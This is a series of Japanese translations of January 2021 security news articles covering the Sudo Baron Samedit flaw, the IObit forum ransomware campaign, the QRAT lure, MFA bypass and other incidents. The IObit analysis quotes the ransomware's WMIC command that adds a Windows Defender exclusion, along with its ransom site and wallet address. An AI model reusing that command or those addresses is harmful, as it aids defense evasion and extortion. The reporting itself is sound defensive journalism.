www.supernetforme[.]com 
 これらのドメイン名は共に、以下に示すように、35.186.238[.]101 に解決される。
 マルウェアが、これらのドメインでURLに接続しようとすると、現在perl.comを訪問するために使用されているものと同じパーク ドメイン スクリプトを受け取るだろう。
 これらHTMLレスポンスは、C2(コマンドアンドコントロールサーバ)の指示ではなく、このIPアドレスが、異なる脅威のアクターの制御下にあることを示している可能性がある。
 現在に関しては、このドメインをPerl Foundationが取り戻すまで、perl.comを訪問しないよう強くアドバイスする。攻撃者は、このドメインを多くの悪意ある目的のためのサイトに簡単に切り替えることができるのだから。
新しいLinuxのSUDOフローは、ローカルユーザがルート権限を取得することを可能にしていた 
 BleepingComputer : News>Security(2021/01/26) 
 既に修正されているSudoの脆弱性は、全てのローカルユーザが認証を要求されることなく、Unix-likeなオペレーティングシステムでルート権限を取得することを可能にしていた。
 
Sudo は、sudoersファイルにリストされた通常ユーザに対して限定的にルート権限を提供してシステム管理者にするUnixプログラムである。
 これは、このプログラムがローカルユーザに対してシステム全体のセキュリティを改竄することなく作業を実行するために必要なパーミッションだけを付与するとする最小権限の原則(Principle of Least Privilege)で動作する。
 Unix-likeなOS上でコマンドを実行すると、非特権ユーザが、パーミッションを持っているか、ルートユーザパスワードを知っている場合には、
sudo (superuser do)コマンドを使用してルートとしてコマンドを実行することができる。ルートはシステムのスーパーユーザであり、特別なシステム管理アカウントである。
 Sudoはまた、sudoers設定ファイルに特別な命令を含ませることによって、通常ユーザが他のユーザとしてコマンドを実行できるように設定することができる。
ローカルユーザ用のルート特権 
 CVE-2021-3156 (別名、Baron Samedit) として追跡されるSudoの特権昇格の脆弱性は、Qualysのセキュリティ研究者によって発見された。彼らは、1月13日に明らかにし、パッチが利用可能になったことを確認した後に、彼らの調査結果を公開した。
 Qualysの研究者によると、この問題は、攻撃者がこのフローを成功裏に攻撃するためにユーザのパスワードを知る必要はないので、任意のローカルユーザ(通常ユーザ、システムユーザ、sudoersファイルにリストされているか否かに関わらず)によって悪用できるヒープベースのバッファオーバーフローである。
 任意のローカルユーザにルート特権の取得を可能にするこのバッファオーバーフローは、引数中のバックスラッシュを不正にエスケープされない形に戻したSudoによってトリガーされる。
 「通常、Sudoはシェル(sudo -s もしくは sudo -i)を介してコマンドを実行している時、特別な文字をエスケープする」と、1.9.5p2チェンジログにある。
 「しかしながら、Sudoは、-s もしくは -iフラグ付きでsudoeditを実行することも可能である。この場合に、実際にはエスケープが実行されないので、バッファオーバーフローが可能になる。」
 Qualysは、潜在的な攻撃者によって、この脆弱性が成功裏に悪用される方法を示すために、三つのCVE-2021-3156に対するエクスプロイトを作成した。
 これらのエクスプロイトを使用することで、この研究者は複数のLinuxディストリビューションで完全なルート権限を取得することができた。この中には、Debian 10 (Sudo 1.8.27), Ubuntu 20.04 (Sudo 1.8.31), Fedora 33 (Sudo 1.9.2)が含まれる。
 Qualysによると、Sudoをサポートする他のオペレーティングシステムとディストリビューションも、おそらくCVE-2021-3156に対するエクスプロイトを使用して脆弱性攻撃することが可能である。
 CVE-2021-3156を脆弱性攻撃する方法の技術的な詳細は、火曜日に公開された
QualysのCVE-2021-3156セキュリティ アドバイザリ を参照されたい。
 緊急のCVE-2021-3156を脆弱性攻撃する方法のデモンストレーション ビデオは、
こちらのリンク 参照。
Baron Sameditフローは公開される前に修正された 
 この脆弱性は、9年前(2011年7月)にSudoプログラムに導入された(
付託8255ed69 )、そして、1.9.0から1.9.5p1までの全ての安定版と1.8.2から1.8.31p2までの全てのレガシーバージョン(【訳注】 ベンダーのサポートが終了したバージョン(Wikipediaより))の設定に影響を与える。
 Sudo貢献者は、先程この脆弱性を修正したバージョンsudo 1.9.5p2をリリースした。同時にQualysは、彼らの調査結果を公開した。
 あなたのシステムに脆弱性が存在するか否かをテストするには、非ルートユーザとしてログインし、"sudoedit -s /"コマンドを実行する。脆弱性のあるシステムは、"sudoedit:"で始まるエラーを投げてくる。また、パッチされているシステムは、"usage:"で始まるエラーを表示する。
 ユーザにルート権限を渡すためにSudoを使用しているシステム管理者は、即座に
Sudo 1.9.5p2もしくは、それ以降 のバージョンにアップグレードしなさい。
 2019年、別のSudo脆弱性(
CVE-2019-14287 として追跡された)は、非特権ユーザに
ルートとしてコマンドを実行する ことを可能にしていた。
 幸いなことに、このフローは非標準設定でのみ脆弱性攻撃される。このことは脆弱性のあるSudoを稼働している殆どのシステムでは影響を受けないことを意味している。
Windows 10のNTFS破損のバグに非公式の一時的な修正がリリースされた 
 BleepingComputer : News>Security(2021/01/25) 
 開発者は、特別に細工されたファイルを単に閲覧するだけでNTFSボリュームを破損に導くWindowsのバグに関する非公式の修正をリリースした。
 今月始め、BleepingComputerは、Windows 10のバグがセキュリティ研究者
Jonas Lykkegaard によって発見されたことを
レポート した。このバグは、特権のないユーザーがNTFSボリュームを破損としてマークすることを可能にするものである。
 このボリュームが破損としてマークされると、Windowsは、そのドライブが損壊しているのでコンピュータを再起動してchkdskを実行し、この破損を修正するように促すエラーを表示する。
 殆どの人々に関しては、Windowsがchkdskを実行するとオペレーティングシステムは直ぐに通常通りにブートするだろう。残念ながら、BleepingComputerのテストでは、chkdskを実行した後でさえ、オペレーティングシステムは適切に動作しなかった。
 BleepingComputerが後に学んだことだが、このバグはまたWindows XPを含むWindowsの過去のバージョンにも影響を与える。
サードパーティーがNTFSバグの修正をリリースした 
 Windows内部に特化したソフトウェア開発企業OSRは、Microsofstからの公式の修正を待っている間に、このNTFSバグが悪用されることを妨げるために、オープンソース フィルタードライバをリリースした。
 'i30Flt'と呼ばれるこのフィルタードライバは、“:$i30:"で始まるストリームへのアクセスを監視する。検出された場合には、このバグの引き金を引かれる前に、それらをブロックする。
 「OSRDrivers/i30Flt: これは“:$i30:"で始まるストリームへの如何なるアクセスもブロックする単なるフィルターである。これは、特定のWindows10のバージョンでトリガーされる偽の破損警告を停止する(github.com)」と、OSRはこのバグに関する
ブログへの投稿 で述べている。
 BleepingComputer同様に、OSRはこのバグをひねくり回していた時に、chkdskを実行した後にも最早ブートしなくなったシステムに遭遇した。
「また、OSRには、このバグをひねくり回している間に2回chkdskを行ってもブートしないシステムがある。酷い警告と破損したシステムの間で、我々は本物の修正がリリースされるまで緩和策を取ることは有益であると考えた。」- OSR
 
 このドライバをインストールするには、
このプロジェクトのGitHubページ から、このドライバをダウンロードし、
管理者特権でコマンドプロンプト を起動する。次に、このファイルを解凍したフォルダに移動する。
 このファイルの存在するフォルダに入ったら、このドライバをインストールするために以下のコマンドを実行する。
RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\i30flt.inf 
 ドライバをインストールした後に、Windowsを再起動する必要はない。
 OSRのドライバがインストールされ、"$i30:"を含むパスへアクセスしようとする行為が検出されると、この企てはブロックされ、以下に示すイベントログが生成される。
 Microsoftがこのバグを修正する用意があるとBleepingComputerに告げてきているので、パッチされたなら以下のコマンドを使用して、このフィルタドライバーを削除しなさい。
RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultUninstall 132 .\i30flt.inf
 
 以下に示したように、このバグが修正される前に、このドライバをアンインストールすると、このバグは直ちにドライバを破損としてマークするために使用される。
 Microsoftが、このバグをいつ修正する計画なのか不明である。あなたのコンピュータで脅威のアクターが、このバグを悪用する可能性が懸念されるのなら、このドライバは、待っている間の適切な代替である。
別の身代金要求型マルウェアのギャングは、犠牲者に支払いを強制するために現在DDoS攻撃を使用している 
 BleepingComputer : News>Security(2021/01/20) 
 別の身代金要求型マルウェアのギャングは、犠牲者に彼らと接触することを矯正し、身代金交渉を行うためにDDoS攻撃を現在使用している。
 2020年10月、我々は身代金要求型マルウェアのギャングが、犠牲者に身代金を支払わせるための追加のツールとして、
犠牲者のネットワーク、もしくはWebサイトに対してDDoS攻撃 を悪用し始めたとレポートした。この時点で、この二つの戦術を使用していたオペレーションはSunCryptとRagnarLockerであった。
 distributed denial of service (DDoS、分散型DoS攻撃)は、脅威のアクターが、サービスを不可能にするためにWebサイトが取り扱えない過剰なリクエストでWebサイトやネットワーク接続を機能不全に追い込むものである。
 企業が身代金要求型マルウェアの被害を受けた時、多くの犠牲者はバックアップからリストアし、攻撃者との接触を行わない。
 Avaddon身代金要求型マルウェアのギャングは、犠牲者がこのギャングと接触し交渉を開始するまで、犠牲者のサイトやネットワークを引きずり倒すために現在DDoS攻撃を使用している。
 「また、彼らのサイトは現在DDoS攻撃下にある、我々は、彼らが接触してくるまで攻撃する」と、Avaddonは彼らの
身代金要求型マルウェアのデータリークサイト で述べている。
 Avaddonに現在DDoS攻撃を実行されている犠牲者の方々に、貴方方は、このWebサイトを最早見ることはできない。
 BleepingComputerとこの展開を共有しているEmsisoftの脅威のアナリストBrett Callowは、「脅威のアクターが、身代金要求型マルウェアとDDoS攻撃を組み合わせていることを見るのは全く驚くようなことではない。DDoSは安価で簡単であり、場合によっては、迅速な支払いが最も苦痛の少ないオプションであると、一部の企業に納得させる役に立つ可能性がある。犯罪者が企業に圧力をかければかけるほど、 支払わせる可能性がより高くなる」と、CallowはBleepingComputerへのメールで述べている。
 
Mazeが二重脅迫戦略を導入 したとき、他の身代金要求型マルウェアのギャングは、直ちにこの方法を採用した。脅威のアクターが、同じ様にDDoS攻撃を採用するか否かを判断することは時期尚早である。
ハッカーは、Nitro PDFの7700万ユーザレコードを含む全データベースをリークした 
 BleepingComputer : News>Security(2021/01/20) 
 Nitro PDFサービスユーザの7700万レコードを超えるeMailアドレス、名前、パスワードを含むデータベースが、本日無料でリークされた。
 リークされた14GBのデータベースは、ユーザのeMailアドレス、フルネーム、bcryptでハッシュされたパスワード、職名、企業名、IPアドレス、他のシステム関連情報を含む77,159,696レコードで構成されている。
 このデータベースは、ユーザーが、このセキュリティ侵害で自分の情報が危険にさらされ、インターネット上に漏洩されたか否かを確認できる
Have I been Pwnedサービスにも追加 されている。
 Nitroは、PDFとデジタルドキュメントを作成、編集、署名の手助けをするアプリケーションであり、Nitro Softwareが、10,000を超えるビジネスカスタマー(事業者顧客)と、凡そ180万のライセンスユーザ(使用権が認められているユーザ)を持つと主張するアプリケーションである。
 Nitroはまた、顧客がドキュメント作成のプロセスで、関連する共同作業者やあらゆる他の組織とドキュメントを共有するために使用できるクラウドサービスも提供している。
Nitroのデータ漏洩 
 BleepingComputerが昨年報道した
巨大なNitro PDF情報漏洩 は、Google, Apple, Microsoft, Chase, Citibankを含む多くの著名な組織に衝撃を与えた。
 Nitro Softwareは、2020/10/21にオーストラリア株式取引所へのアドバイザリにおいて"low impact security incident"(低位影響セキュリティ事案)であり、影響を受けた顧客データはないと述べていた。
 しかしながら、BleepingComputerが後で発見したことだが、7000万のNitro PDFユーザレコード情報を含むデータベースと見做されているものが、1TBのドキュメントと共にオークションにかけられ、初値は$80,000(8,286,400円)であった。
 BleepingComputerは、Nitroアカウントの既知のeMailアドレスがオークションにかけられたデータベース中に存在していることを確認した後、盗まれたデータベースが本物であると断定した。
盗まれたユーザレコードは無料でリークされた 
 現在、ShinyHuntersの一員であると主張する脅威のアクターは、ハッカーフォーラムに無料で全データベースをリークした(この脅威のアクターは、ダウンロードリンクへのアクセス料を$3に設定している)。
 ShinyHuntersは、オンラインサービスをハッキングし、情報漏洩ブローカーや個人での販売を介して盗んだ情報を販売することで知られる悪名高い脅威のアクターである。
 以前、ShinyHuntersは、
Homechef , 
Wattpad , 
Minted , 
Tokopedia , 
Dave , 
Promo , 
Chatbooks ,  
Mathway ,その他多くを晒した背後に自分たちが存在していると発言していた。この情報は真実であることが証明されている。
 悪意ある攻撃者は、漏洩されたユーザーの詳細を使用して、より信頼性の高いフィッシング攻撃、あるいはクレデンシャルスタッフィング攻撃(【訳注】 別名パスワードリスト型攻撃と呼ばれ、ユーザーアカウント情報の流出を悪用し、自動でさまざまなサービスに不正アクセスしようというサイバー攻撃(飛天ジャパンより))、を開始するので、影響を受けるNitro PDFユーザーは、パスワードを強力で一意のものに変更することを強く勧める。
 ユーザーは、パスワードを他の如何なるWebサイトやオンラインサービスでは使用していない一意で強力なものに変更する必要がある。
 パスワードマネージャーを使用することも推奨される。これは夫々のサイトで一意のパスワードを管理・生成する手助けとなる。
VLCメディアプレイヤー 3.0.12: 複数のリモートコード実行のフローを修正 
 BleepingComputer : News>Security(2021/01/20) 
 先週、VideoLanは、多くの改善、機能、セキュリティフィックスを実行したWindows,Mac、Linux用のVLCメディアプレーヤー3.0.21をリリースした。
 このリリースは、Apple Siliconのネイティブサポートを改善し、macOSでのオーディオ音声歪を修正しているので、Macユーザにとっては重要なアップグレードである。
 バグの修正と改善に加えて、このリリースは、NSFOCUS Security TeamのZhen Zhouによってレポートされた多くのセキュリティ上の脆弱性を修正している。
 これらのバッファオーバーフローもしくは無効な間接参照の脆弱性は、「VLCのクラッシュか、ターゲットユーザの特権で任意のコード実行かのいずれかを実行することができた。」
 VideoLanの
セキュリティブレチン によると、リモートユーザは、特別に細工されたメディアファイルを作成し、ユーザを欺いてVLCでそれを開かせることによって、この脆弱性を攻撃することができる。
 VideoLanは、この脆弱性が、VLCメディアプレーヤーをクラッシュさせるだろうと述べ、攻撃者は情報をリークしたり、リモードからそのデバイス上でコマンドを実行するために、この脆弱性を使用できると、彼らは警告している。
成功した場合、悪意あるサードパーティは、VLCのクラッシュを引き起こすか、ターゲットユーザーの特権で任意のコードを実行する可能性があります。 
 VideoLanは、オンライン上でこれらの脆弱性が悪用した攻撃を確認していないと述べている。
 この脆弱性の緊急性とVLC 3.0.12の改善により、全てのユーザは
バージョン3.0.21をダウンロードしインストールする よう強くアドバイスする。
 以下で、バージョン3.0.21の全てのチェンジログを読むことができる
Access:
Access Output:
Demux:
Audio output:
Video Output:
macOS:
Misc: 
IObitフォーラムがハックされ身代金要求型マルウェアがメンバーに拡散している 
 BleepingComputer : News>Security(2021/01/18) 
 Windowsユーティリティ・デベロッパIObitが週末に渡ってハックされ、そのフォーラムのメンバーに奇妙なDeroHE身代金要求型マルウェアを配布する広汎な攻撃が実行されている。
 IObitは、Advanced SystemCareのようなWindowsシステムの最適化とアンチマルウェア プログラムで知られるソフトウェア・デベロッパである。
 週末に渡り、IObitフォーラムのメンバーは、フォーラムメンバーの特別な特典として、ソフトウェアの1年間の無料ライセンスを取得できると題されたIObitからと主張するeMailを受け取り始めた。
 このeMailに含まれている'GET IT NOW'リンクは、hxxps://forums.iobit.com/promo.htmlにリダイレクトする。このページは最早存在していないが、攻撃の時点では、hxxps://forums.iobit.com/free-iobit-license-promo.zipファイルを配布していた。
 このzipファイル[
VirusTotal ]は、正規のIObit License Managerプログラムからのデジタル署名されたファイルを含んでいたが、下図に示したように、IObitUnlocker.dllは、未署名の悪意あるバージョンに置き換えられていた。
 IObit License Manager.exeが実行されると、悪意あるIObitUnlocker.dllが実行され、C:\Program Files (x86)\IObit\iobit.dll[
VirusTotal ]にDeroHE身代金要求型マルウェアがインストールされ、実行される。
 殆どの実行ファイルは、IOBitの認証で署名され、このZipファイルがIObitのサイトにホストされていたので、ユーザは、これが正規の販促であると考えて、
この身代金要求型マルウェアをインストールした 。
 IObitと他のフォーラム[
1 ,
2 ]のレポートに基づくと、これは、全てのフォーラムメンバーをターゲットにした広汎な攻撃である。
DeroHE身代金要求型マルウェアの詳細な検証 
 BleepingComputerは、この身代金要求型マルウェアが犠牲者のコンピュータで実行された時に何が発生するのかを説明するために、この身代金要求型マルウェアを解析した。
 最初に起動した時、この身代金要求型マルウェアは、Windowsにログインしたときに"rundll32 "C:\Program Files (x86)\IObit\iobit.dll",DllEntry"コマンドを実行する"IObit License Manager"と名付けられたWindows autorunを追加する。
 この身代金要求型マルウェアを解析したEmsisoftのアナリスト
Elise van Dorp は、この身代金要求型マルウェアが、このDLLの実行を可能にするためにWindows Defenderの排除を追加すると述べている。
@WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\" 
 ここで、この身代金要求型マルウェアは、"Please wait. It may take a little longer than expected. Keep your computer running or screen on!'と述べるIObit License Managerからとするメッセージボックスを表示する。この警告は、この身代金要求型マルウェアが終了する前に、犠牲者が彼らのデバイスをシャットダウンすることを妨げるために、このマルウェアが表示するものである。
コンピュータをシャットダウンさせないためのインチキ警告
 
 犠牲者のファイルを暗号化すると、この身代金要求型マルウェアは、暗号化したファイルに .DeroHE拡張子を追加する。
 以下に示したように、暗号化されたファイルは夫々、情報文字列をファイルの末尾に追加されている。この身代金要求型マルウェアは、身代金が支払われた場合に、ファイルの復号にこの情報を使用する可能性がある。
 {"version":"3","id":"dERiqiUutvp35oSUfRSTCXL53TRakECSGQVQ2hhUjuCEjC6zSNFZsRqav 
 Windowsデスクトップに、この身代金要求型マルウェアは、暗号化されたファイルのリストを含むFILES_ENCRYPTED.htmlと、脅迫文READ_TO_DECRYPT.htmlの二つのファイルを作成する。
 この脅迫文は、'Dero Homomorphic Encryption'というタイトルであり、DEROという暗号通貨を推奨している。この脅迫文は、犠牲者に対して復号プログラムを得るにはリストされているアドレスに200コイン(およそ100$)送信するように告げている。
 この脅迫文に含まれているのは、この身代金要求型マルウェアのTorサイトhttp://deropayysnkrl5xu7ic5fdprz5ixgdwy6ikxe2g3mh2erikudscrkpqd.onionである。これは支払いを実行するために使用される。
 特に興味を惹くのは、IObitがDEROで$100,000支払えば、全ての犠牲者を復号できると、このTorサイトで述べていることである。
 「このアドレスへ100000DEROコイン我々に送信するようにiobit.comに告げる。dERopYDgpD235oSUfRSTCXL53TRakECSGQVQ2hhUjuCEjC6zSNFZsRqavVVSdyEzaViULt
CRPxzRwRCKZ2j2ugCg26hRtLziwu」
 「支払いが到着次第、暗号化された全てのコンピュータは復号される。これは、貴方方のコンピュータが感染したのはIOBITの失敗によるものである」と、DeroHEのTor支払いサイトは述べている。
 この身代金要求型マルウェアは弱点が解析されており、無料で復号できるか否かは不明である。
 更に、脅威のアクターが約束をまもり、支払いが実行された場合に復号プログラムを提供するか否かは不明である。
Iobitフォーラムはセキュリティ侵害されたようである 
 インチキの販促ページを作成し、悪意あるダウンロードをホストするために、攻撃者はIObitフォーラムをハックし、管理者アカウントへのアクセスを取得したと思われる。
 この時点で、このフォーラムは依然として改竄されたままのようである。恰も、削除されたページを訪問したような404エラーコードを戻してくる。このWebページはブラウザ通知に同意するためのダイアログを表示する。あなたのブラウザが同意すると、アダルトサイト、悪意あるソフトウェア、他の好ましからざるコンテンツを奨励するデスクトップ通知を受け取ることになる。
 更に、このページの何処かをクリックすると、アダルトサイトの広告を表示する新しいタブが開く。他のサイト セクションも、フォーラムリンクをクリックすると、似たようなアダルトページにリダイレクトされるようにセキュリティ侵害されているようである。
 以下に示したように、全てのページに発見されていない悪意あるスクリプトを挿入することで、このフォーラムをセキュリティ侵害した。
 BleepingComputerは、この攻撃に関連する質問をIObitに送ったが、回答は未だない。
2021/1/19 アップデート: 
Ronny として知られるセキュリティ研究者は、IObitはフォーラムのソフトウェアとしてvBullentin 5.6.1を使用中であると、BleepingComputerに告げてきた。
 vBullentinのこのバージョンは、リモートアタッカーがこのフォーラムの制御を取得することが可能な
既知の脆弱性 を持っている。
サイバー犯罪者は多要素認証をバイパスし、組織のクラウドサービスにアクセスしている 
 Tripwire : The State of Security(2021/01/14) 
 米国の国土安全保障省国家保護・プログラム総局(Cybersecurity and Infrastructure Security Agency、CISA)は、最近幾つかの攻撃の成功を受けて、企業が、彼らの
クラウド ベース アカウントをより適切に防御するための警告を発行した。
 
公開されたCISAのアドバイザリ によると、COVID-19(【訳注】 新型コロナウィルス感染症の病名)パンデミックの間に、多くの従業員が様々なラップトップや個人のデバイスでリモートワークを始めた時に攻撃数は増加している。
 CISAは、攻撃者達が、人間の弱点を攻撃するフィッシングや、企業のクラウドアカウントのセキュリティ設定への攻撃を企てるブルートフォース ログインを含む
様々なテクニック を使用していたことに気づいた。
 このアドバイザリにおいて説明されている或る場合において、組織は、そのネットワークにアクセスする時にVPNの使用を要求しておらず、意図的にリモートワーカーがシステムにアクセスし易いように設計された緩い設定が、組織のネットワーク脆弱性を残したままにしていたために、誰もがブルートフォース ログイン攻撃を介してアクセスできた。
 他の攻撃では、悪意あるハッカーは、ユーザがログイン時に要求される正当なサイトにホストされている「安全なメッセージ」へのリンクであると主張するeMailフィッシング攻撃を介して、ユーザのクラウドサービスアカウント ログイン認証をフィッシングしていることが確認されている。
「標的となる受信者が、彼らの認証情報を提供した後、脅威のアクターは、盗んだ認証情報を使用して、ユーザーのクラウドサービスアカウントへの最初のアクセスを取得している。」 「CISAは、海外の場所から発信された、この脅威のアクターのログインに気づいた(ただし、この脅威のアクターはプロキシ、または、オニオンルーター(Tor)を使用して彼らの位置を分かり難くしていた可能性がある)。 次に、この脅威のアクターは、ユーザーのアカウントからその組織の内部の別のアカウントにメールを送信している。幾つかの場合では、これらのeMailは、組織のファイル ホスティングサービスであるかのようなドキュメントへのリンクを含んでいた。」
 
 CISAの警告で最も興味を惹くことは、強く推奨されているセキュリティ基準である多要素認証をバイパスし、クラウドサービス アカウントをセキュリティ侵害した証拠が確認されていることである。
 先述のケースでは、悪意あるハッカーは他要素認証を回避するために
“pass-the-cookie”攻撃 を使用していたと確信していると、CISAは発言している。
【訳注】“pass-the-cookie”について: 基本的に、Webアプリケーションの上にMFA(多要素認証)を配置すると、ログインしているユーザーは、モバイルデバイスでプッシュ通知を受け入れるなど、本人であるという追加の証拠を提供するように求められます。これらのテストをすべて通過すると、アプリへのアクセスが許可されます。その時点で、そのユーザーのセッション用にブラウザCookieが作成され、保存されます。 
 多要素認証はセキュリティを強固にし、犯罪者がアカウントに侵入することをより困難にする優れた方法であるが、成功への強い意欲があるハッカーにとってセキュリティ侵害を不可能にしていることを意味していない。このことを心に留めおくことは価値あることである。
 例えば、2018年3月、暗号通貨取引所Binanceは、緊急システムが2分間の異常な取引を確認した後、
全ての引き出しを停止 した。
 その後、このフィッシング攻撃は、Binanceを装うサイトにユーザを連れ込み、彼らの
パスワードと多要素認証のコードを入力 するように求めることが判明した。多要素認証コードは30秒間有効であったため、攻撃者は本物のサイト用の取引APIキーを生成し使用することができた。
 攻撃者がソーシャルエンジニアリングや技術的な攻撃を介して他要素認証を回避できることは明らかであるが、このことは、貴方方が他要素認証を使用しても仕方がないということを意味していない。
Microsoftの言葉を借りれば 、「多要素認証を使用すると、アカウントがセキュリティ侵害される可能性は、99.9%以上低くなる。」
 明らかに、ユーザは、攻撃者が作成したインチキのサイトに多要素認証のコードを入力しているのではなく、本物のサイトにのみ多要素認証のコードを入力しているという注意が必要である。
 攻撃者が、企業のクラウドベースのサービスへのアクセスを獲得すると、組織に関する情報の収集、データの盗用、他の従業員やパートナーのシステムを攻撃、今後のアクセスがブロックされるようにログイン認証が変更された場合でさえ、機密情報に継続してアクセスできるようにメール転送ルールを設定するなど、多くの奥の手を所有することができる。
 CISAは、そのWebサイトに、組織が彼らの
クラウドセキュリティ 慣行を強固にすることに役に立つ長大な
勧告 リストを公開した。このリストには、多要素認証の実施、eMail転送に関する制限、仕事に個人のデバイスを使用しないことの推奨、従業員へのセキュリティ意識向上のためのトレーニングが含まれている。
Microsoft: 現在脆弱性攻撃されているDefenderの0-Dayをパッチ 
 BleepingComputer : News>Security(2021/01/12) 
 Microsoftは、Microsoft Defender中の0-Dayの脆弱性を解決した。ただ、このパッチをリリースする前に脅威のアクターによる攻撃は行われていた。
 0-Dayとは、そのベンダーが公式のパッチをリリースする前にオンライン上で積極的な脆弱性攻撃が行われている脆弱性、あるいは、公開されている概念の実証の脆弱性攻撃があるバグのことである。
 Microsoftが本日パッチした0-Dayは、
CVE-2021-1647 として追跡されている。この脆弱性は、Malware Protection Engineコンポーネント(mpengine.dll)中に発見されたリモートコード実行(RCE)の脆弱性である。
利用できる概念の実証 
 
 この0-Dayに関する概念の実証(PoC)の脆弱性攻撃は可能だが、脆弱性攻撃は、殆どのシステムで不可能であったり、幾つかのシチュエーションでは、このPoCは失敗する可能性があると、Microsoftは発言している。
 この脆弱性によって影響を受ける最新のMicrosoft Malware Protection Engineは、バージョン1.1.17600.5である。この0-Dayは、バージョン1.1.17700.4では解決されている。
 Microsoft Malware Protection Engineのバージョン番号を調べる方法の詳細に関しては、
こちら を参照されたい。この脆弱性の影響を受けないシステムは、Microsoft Malware Protection Engineのバージョン1.1.17700.4以降を実行しているはずである。
 「お客様は、Microsoft Malware Protection Engineの最新バージョンと定義の更新が、Microsoftマルウェア対策製品用にアクティブにダウンロードおよびインストールされていることを確認する必要があります」と、Microsoftは発言している。
Defenderのセキュリティアップデートは自動的にインストールされる 
 
 このMicrosoftのアドバイザリは、脆弱性のあるMicrosoft Defenderのバージョンを実行しているシステムには、自動的にインストールされるので、顧客はCVE-2021-1647セキュリティアップデートをインストールするために、如何なるアクションも必要としないと追加している。
 「絶えず変化する脅威の状況に対応して、Microsoftは頻繁にマルウェア定義とMicrosoft Malware Protection Engineをアップデートしている」と、Microsoftは発言している。
 Microsoft Defenderは、Microsoft Malware Protection Engine(スキャン、検出、クリーニングに使用されるコンポーネント)とマルウェア定義の2つを、企業とエンドユーザの両方に対し自動的にアップデートし続けている。
 通常、Microsoft Malware Protection Engineアップデートは、一月に一度、もしくは、マルウェア定義が一日に3回アップデートされる間に、新たに発見された脅威に対して保護する必要がある時にリリースされる。
 Microsoft Defenderはエンジンと定義の更新を一日に数回チェックできるが、ユーザが、セキュリティアップデートを即時にインストールしたいのなら、あらゆる時に手動チェックすることもできる。
 Microsoftは、Microsoft PSExecユーティリティ中にある0-Dayの特権の昇格に関する脆弱性の公式パッチを未だリリースしていない。このバグは先週、0patchプラットフォームを介して
無料のマイクロパッチ を受け取っている。
それはトランプのセックスビデオではない、RATである 
 Threat Post : News(2021/01/06) 
 退任するドナルド・トランプ大統領が引き続き見出しの大半を占めているため、サイバー犯罪者はマルウェアを配布するための疑似餌としてトランプのセックスビデオに着目した。
 Trustwaveの研究者の新しいレポートによると、このキャンペーンは、マルウェアダウンローダーにファイル名“TRUMP_SEX_SCANDAL_Video”とラベリングしていることが明らかにされた。これはeMail中の悪意あるリンクを介して拡散するものである。
 クリックすると、ユーザに猥褻なビデオをもたらすのではなく、犯罪者に、感染したシステムに総合的なリモートアクセスを提供するための
QRAT をインストールする。
QRAT 
 
 Quaverse Remote Access Trojan  (QRAT)は、2015年に発見された
Javaベースのリモートアクセス トロイ (RAT)でありQuaverseのプラグインによって強化されていると、Trustwaveは説明している。
 昨年の8月の始め、Trustwaveの研究者は、
QRATを押し付けようとするフィッシングスカム が増加しているとレポートしていた。Trustwaveの研究者Diana Loperaによると、この
最新のフィッシングの企て で興味深いのは、件名とファイル名が無関係なことだとしている。
 件名が“GOOD LOAN OFFER!!”になっているこのeMailは、一瞥して通常の出資スカムである。「このeMailの件名も本文もありきたりのものである。興味あることは、このeMailに添付されているアーカイブが“TRUMP_SEX_SCANDAL_VIDEO.jar”と名付けられたJava Archive(JAR)ファイルを含んでいることにある」と、Loperaは、この発見をレポート中で発言している。
 Loperaは、選挙を取り巻く最近の見出しが、悪意のある攻撃者が詐欺を行うために十分な隠れ蓑を提供したと付け加えている。
 「添付ファイルに使用されているファイル名は、メールのテーマとは全く無関係であるため、悪漢共は、最近終了した大統領選挙によって齎された狂乱に乗じようとしているのではないかと疑っている」と、Loperaは発言している。
QRATの変種 
 このQRATは、前身のマルウェアから幾つかの変種が発生しているため悪名高いものであると。Loperaは説明している。
 「この脅威は、我々が最初に調査して以来ここ数カ月間で顕著に拡大している」と、更に「 QNode RATでシステムに感染するという同じ最終目標を達成するために、JARファイルダウンローダーの特性と挙動は改良されている」とLoperaは発言している。
 このコードのバージョンは、base64で暗号化されている。このモジュールは、Allatori Obfuscator(【訳注】 第2世代の難読化ツールのファミリーに属するJava難読化ツール(Updatestarより))で隠されている。犠牲者のネットワーク情報は、ここで“hxxps://wtfismyip[.]com”から取得される。最後に、パスワード リカバリもまたChrome, Firefox, Thunderbird, Outlookでサポートされていると、このレポートは説明している。
 「このダウンローダーの悪意あるコードは、追加されたジャンクデータと共に番号付けされたファイルに分割されている」と、Loperaは記述している。
 最新の.JAR変種も詐欺用のMicrosoft ISCライセンスを含んでいる。これは、ユーザに、この.JARファイルがリモート侵入テスト(【訳注】 通信ネットワークで外部と接続されたコンピュータシステムの安全性を調査するテスト手法の一つ(IT用語辞典より))のために実行されると告げるメッセージを提供していると、このレポートは発言している。
 “TRUMP_SEX_SCANDAL_VIDEO.jar”ファイルの実行時に、そのコピーが作成され次に、%temp%(【訳注】 C:\Windows\TEMP(システム)、C:\Users\ユーザー名\AppData\Local\Temp(ユーザ))フォルダから実行される」更に、「次に、侵入テスト用に使用されるリモートアクセスソフトウェアであるこの悪意あるJARファイルが実行される。このサンプルの悪意ある挙動は、‘Ok, I know what I am doing’ボタンをクリックすると現れ始める」と、Loperaは発言している。
 この変種と今までの既知の.JARファイルとのもう一つの相違は、コードの文字列が欠如していることである。
 彼女の観察では、「第三、この脅威に関連するファイルを以前同定した文字列“qnodejs”は、この変種中には存在していない。」
 この.JARファイルの早期のバージョンは、C2サーバ(コマンドアンドコントロール サーバ)とコミュニケーションするために必須のQHubサブスクリプションに関する情報を含んでいたと、このレポートは発言している。
 「我々が早期の変種中に観察したQHubサブスクリプション ユーザに関する情報は、このJARファイルには最早含まれていない」と、Loperaは発言している。
「アマチュア」の試み 
 この最新のQRAT変種からシステムを保護するために、Loperaは、電子メール管理者がセキュリティ ゲートウェイで.JARファイルをブロックすることを推奨している。
 「添付ファイルのペイロードは、今までの変種に比べ幾つかの改悪が見られるが、このeMailキャンペーン自体は、むしろアマチュアっぽいものであり、もしも、このeMailがより洗練されたものであったなら、この脅威が成功裏に拡散するチャンスは高いと確信している」と、「悪意あるJARファイルからのスパムは、非常に一般的なものであり、このようなRATにしばしばつながっている」と、Loperaは記述している。
